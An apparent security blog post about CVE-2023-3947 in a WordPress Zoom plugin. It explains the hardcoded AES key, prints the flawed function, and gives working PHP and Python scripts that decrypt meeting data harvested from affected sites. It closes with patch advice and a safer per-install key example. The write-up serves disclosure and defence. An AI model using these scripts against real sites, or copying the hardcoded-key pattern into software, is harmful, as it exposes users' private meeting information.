CVE-2023-3947 - Sensitive Information Exposure in WordPress Zoom Plugin (with Code and Exploit Details)
Disclaimer: This post is for educational purposes only. Do not use this information for unauthorized or malicious activity.
The Video Conferencing with Zoom plugin for WordPress is a popular tool that helps website owners schedule and manage Zoom meetings straight from their WordPress dashboard. But, as with many plugins, vulnerabilities can be discovered that put data and users at risk.
In this post, we’ll dive into CVE-2023-3947—a security issue where the plugin exposes sensitive Zoom meeting information due to a hardcoded encryption key.
Let’s break down what happened, see how it works, look at some code, and explore potential exploits.
What is CVE-2023-3947?
CVE-2023-3947 affects the "Video Conferencing with Zoom" WordPress plugin. Versions up to (and including) 4.2.1 contain a critical flaw: a hardcoded (fixed and public) encryption key is used in the vczapi_encrypt_decrypt function.
The Problem: Hardcoded Encryption Key
Plugins that handle sensitive information should protect it with strong, private encryption keys. In this case, the key is the same for everyone and written right into the source code.
Here’s a snippet (simplified):
function vczapi_encrypt_decrypt($string, $action = 'encrypt') {
    $secret_key = '123456789abcdefghijklmnopqrstuvwxyz'; // This is the hardcoded key
    $output = false;
    $encrypt_method = "AES-256-CBC";
    // hash() returns a 64-character hex string; OpenSSL uses its first 32 bytes as the AES-256 key
    $key = hash('sha256', $secret_key);
    // The IV is derived from the same fixed key, so it is fixed (and public) as well
    $iv = substr(hash('sha256', $secret_key), 0, 16);
    if ($action == 'encrypt') {
        // options = 0 already returns base64, so the result is base64-encoded twice
        $output = base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
    } else if ($action == 'decrypt') {
        $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
    }
    return $output;
}
Any attacker who grabs the plugin source code can see this key and, because the IV is derived from that same key, the IV as well; with both in hand they can decrypt any information encrypted using this scheme, on any site running the plugin.
Harvest the Encrypted Data:
- Many WordPress sites expose encrypted Zoom meeting details via the plugin’s shortcodes, REST endpoints, or API responses.
Use the Hardcoded Key to Decrypt:
- Since the key and IV are public, anyone can write a script (in PHP, Python, etc.) to decrypt these values.
Anyone can copy this code to decrypt the data:
function decrypt_zoom_data($encrypted) {
    $secret_key = '123456789abcdefghijklmnopqrstuvwxyz';
    $encrypt_method = "AES-256-CBC";
    $key = hash('sha256', $secret_key);            // same hex-string key as the plugin
    $iv = substr(hash('sha256', $secret_key), 0, 16); // same fixed IV as the plugin
    return openssl_decrypt(base64_decode($encrypted), $encrypt_method, $key, 0, $iv);
}
// Usage:
$encrypted_meeting_id = "bz2lK1W35iDtZfVREP3kUg==";
$decrypted_meeting_id = decrypt_zoom_data($encrypted_meeting_id);
echo "Decrypted Meeting ID: " . $decrypted_meeting_id . "\n";
Or, for those who prefer Python (using pycryptodome):
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
import hashlib

def decrypt_zoom_data(encrypted):
    secret_key = b'123456789abcdefghijklmnopqrstuvwxyz'
    # Mirror the PHP exactly: hash('sha256', ...) returns a hex string, OpenSSL keeps
    # the first 32 of its 64 characters as the AES-256 key, and the IV is the first
    # 16 hex characters (as ASCII bytes), not the raw digest.
    key_hex = hashlib.sha256(secret_key).hexdigest()
    key = key_hex[:32].encode()
    iv = key_hex[:16].encode()
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(base64.b64decode(encrypted))
    # openssl_encrypt applies PKCS#7 padding, so strip it the same way
    return unpad(decrypted, AES.block_size).decode()

encrypted_meeting_id = 'bz2lK1W35iDtZfVREP3kUg=='
print("Decrypted Meeting ID:", decrypt_zoom_data(encrypted_meeting_id))
Original References
- WPScan Report for CVE-2023-3947
- NVD - CVE-2023-3947 Entry
- Plugin Source Code (GitHub) (for illustration only)
What Should Site Owners Do?
- Update Immediately: Upgrade "Video Conferencing with Zoom" to the latest version (the issue was fixed after 4.2.1).
- Check Your Site and Logs: Look for suspicious access to the plugin’s shortcodes, REST endpoints, or API responses.
- Vendor Fix: Later versions now use a unique key per installation, and do not expose encryption keys in code.
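As an added example (not the plugin's own patched code), this is what the vendor's approach of a per-installation key looks like in PHP, with a fresh random IV per message and an HMAC so altered ciphertext is rejected. It assumes WordPress's get_option()/update_option() for storage; the option name example_zoom_crypto_key and the example_* function names are placeholders chosen for this illustration.

```php
<?php
// Added example, not the plugin's code: key generated per install and stored in
// the database, random IV per message, encrypt-then-MAC with HMAC-SHA256.

function example_get_install_key() {
    // Generated once on first use; never appears in the source code.
    $stored = get_option('example_zoom_crypto_key'); // placeholder option name
    if (is_string($stored) && strlen($stored) === 128) {
        return hex2bin($stored);
    }
    $key = random_bytes(64); // 32 bytes for AES-256 + 32 bytes for HMAC-SHA256
    update_option('example_zoom_crypto_key', bin2hex($key), false); // autoload off
    return $key;
}

function example_encrypt($plaintext) {
    $key     = example_get_install_key();
    $enc_key = substr($key, 0, 32);
    $mac_key = substr($key, 32, 32);
    $iv      = random_bytes(openssl_cipher_iv_length('aes-256-cbc')); // fresh 16-byte IV
    $ct      = openssl_encrypt($plaintext, 'aes-256-cbc', $enc_key, OPENSSL_RAW_DATA, $iv);
    $mac     = hash_hmac('sha256', $iv . $ct, $mac_key, true);
    // Layout: IV (16) || ciphertext || MAC (32), base64 for storage/transport
    return base64_encode($iv . $ct . $mac);
}

function example_decrypt($encoded) {
    $blob = base64_decode($encoded, true);
    if ($blob === false || strlen($blob) < 16 + 32) {
        return false;
    }
    $key     = example_get_install_key();
    $enc_key = substr($key, 0, 32);
    $mac_key = substr($key, 32, 32);
    $iv  = substr($blob, 0, 16);
    $mac = substr($blob, -32);
    $ct  = substr($blob, 16, strlen($blob) - 48);
    // Constant-time check: anything not produced with this install's key is rejected
    // before the ciphertext ever reaches the decryption routine.
    $expected = hash_hmac('sha256', $iv . $ct, $mac_key, true);
    if (!hash_equals($expected, $mac)) {
        return false;
    }
    return openssl_decrypt($ct, 'aes-256-cbc', $enc_key, OPENSSL_RAW_DATA, $iv);
}
```

Because the key lives only in this site's database, a copy of the plugin source no longer gives anyone the ability to decrypt its data, and a ciphertext taken from one site is useless against another.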
Summary
CVE-2023-3947 is a simple but severe bug: a hardcoded key means zero actual encryption security. Attackers need only a plugin copy to decrypt any user’s sensitive meeting information.
Stay secure and always keep your WordPress plugins up to date.
*If you found this write-up helpful or have more questions about WordPress security, feel free to leave a comment!*
Timeline
Published on: 07/26/2023 04:15:00 UTC
Last modified on: 08/02/2023 19:37:00 UTC